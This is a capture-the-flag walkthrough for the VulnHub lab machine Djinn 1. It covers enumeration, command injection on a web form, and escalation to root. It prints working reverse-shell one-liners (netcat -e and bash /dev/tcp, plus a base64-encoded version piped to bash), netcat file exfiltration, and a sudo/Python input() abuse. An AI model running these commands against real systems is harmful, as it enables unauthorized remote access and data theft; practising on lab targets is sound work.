Djinn 1
Djinn 1 vulnhub Walkthrough
Enumeration
nmap
nmap -sC -sV -oA nmap/djinn 192.168.1.110Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-22 03:22 EDT
Nmap scan report for 192.168.1.110
Host is up (0.00015s latency).
Not shown: 998 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| -rw-r--r-- 1 0 0 11 Oct 20 2019 creds.txt
| -rw-r--r-- 1 0 0 128 Oct 21 2019 game.txt
|_-rw-r--r-- 1 0 0 113 Oct 21 2019 message.txt
| ftp-syst:
| STAT:
| FTP server status:
| Connected to ::ffff:192.168.1.113
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 4
| vsFTPd 3.0.3 - secure, fast, stable
|_End of status
22/tcp filtered ssh
MAC Address: 00:0C:29:3A:97:CE (VMware)
Service Info: OS: Unix
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 1.50 seconds
nmap -p- -Pn 192.168.1.110Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-22 04:17 EDT
Nmap scan report for 192.168.1.110
Host is up (0.00066s latency).
Not shown: 65531 closed ports
PORT STATE SERVICE
21/tcp open ftp
22/tcp filtered ssh
1337/tcp open waste
7331/tcp open swx
MAC Address: 00:0C:29:3A:97:CE (VMware)
Nmap done: 1 IP address (1 host up) scanned in 3.11 seconds
We can see here we have 2 more ports, 1337 and 7331.
FTP
We can see that it has anonymous login. Let's try that
ftp 192.168.1.110
Then, we can list all the directories using ls command
We can see that there are 3 files inside. Let's use get command to get those 3 files
We can see that the content inside these 3 files
More Discovery
We can see that there is port 1337 that we just discovered just now, let's head to the browser
Let's use netcat to get access
Answer 1000 times and I don't think he will give us our gift so let's move on to another port, port 7331.
gobuster
Lets use gobuster to enumerate the URL since we can't find any things interesting inside the site.
gobuster dir -w /usr/share/wordlists/dirb/big.txt -u http://192.168.1.110:7331/===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url: http://192.168.1.110:7331/
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirb/big.txt
[+] Status codes: 200,204,301,302,307,401,403
[+] User Agent: gobuster/3.0.1
[+] Timeout: 10s
===============================================================
2020/05/22 11:05:12 Starting gobuster
===============================================================
/genie (Status: 200)
/wish (Status: 200)
===============================================================
2020/05/22 11:06:02 Finished
===============================================================
We can see that there are 2 directory that is /genie and /wish.
Let's navigate to /wish page
Type id then we will get the response from it
Reverse Shell
But when I set up a listener at my kali machine and type
nc -e /bin/bash 192.168.1.113 444It doesn't work that way, after that we actually need to encode using base64 and use pipe command to decode it and let it execute.
But then no luck too, we need to use bash reverse shell only can work
bash -i >& /dev/tcp/192.168.1.113/4444 0>&1We then go to this website and encode it with base64
Then, we can go to our /wish and type this
echo YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjEuMTEzLzQ0NDQgMD4mMQ== | base64 -d | bash
We can first type this to ensure we get a proper shell
python -c 'import pty; pty.spawn("/bin/bash")'Then we can list out the directory and cat into app.py
Then we cat cat out the credentials.
We can su to the user nitish
Privilege Escalation
We then type sudo -l then we got this
We can use strings command to list out all readable strings from the genie file
We can see there is a -cmd paramter which can be apply.
After playing around we can go to sam user by typing
sudo -u sam genie -cmd new 
We then type sudo -l
If we run sudo /root/lago it will show us this
If we enter all the choices we still can't get through the selection.
So, we can navigate to the /home/sam directory to find out more
When we type ls -la then it will show us hidden files
Then we can use netcat to transfer files to our machine
Our machine
nc -nlvp 9000 > abc.pycTarget machine
nc -nv 192.168.1.113 9000 < .pycpyc is actually compiled file of python files. We can use uncompyle6 to decompile to see the source file of it.
uncompyle6 abc.txt# uncompyle6 version 3.7.0
# Python bytecode 2.7 (62211)
# Decompiled from: Python 2.7.18 (default, Apr 20 2020, 20:30:41)
# [GCC 9.3.0]
# Embedded file name: /home/mzfr/scripts/exp.py
# Compiled at: 2019-11-07 08:05:18
from getpass import getuser
from os import system
from random import randint
def naughtyboi():
print 'Working on it!! '
def guessit():
num = randint(1, 101)
print 'Choose a number between 1 to 100: '
s = input('Enter your number: ')
if s == num:
system('/bin/sh')
else:
print 'Better Luck next time'
def readfiles():
user = getuser()
path = input('Enter the full of the file to read: ')
print 'User %s is not allowed to read %s' % (user, path)
def options():
print 'What do you want to do ?'
print '1 - Be naughty'
print '2 - Guess the number'
print '3 - Read some damn files'
print '4 - Work'
choice = int(input('Enter your choice: '))
return choice
def main(op):
if op == 1:
naughtyboi()
elif op == 2:
guessit()
elif op == 3:
readfiles()
elif op == 4:
print 'work your ass off!!'
else:
print 'Do something better with your life'
if __name__ == '__main__':
main(options())
# okay decompiling abc.pyc
We can see that if input is num then we will able to get root!
After that type sudo -u root /root/lago
Then choose the number 2 and type num when it prompt to let us choose 1 - 100
Got root !
We then navigate to /root directory to get the flag
Last updated
Was this helpful?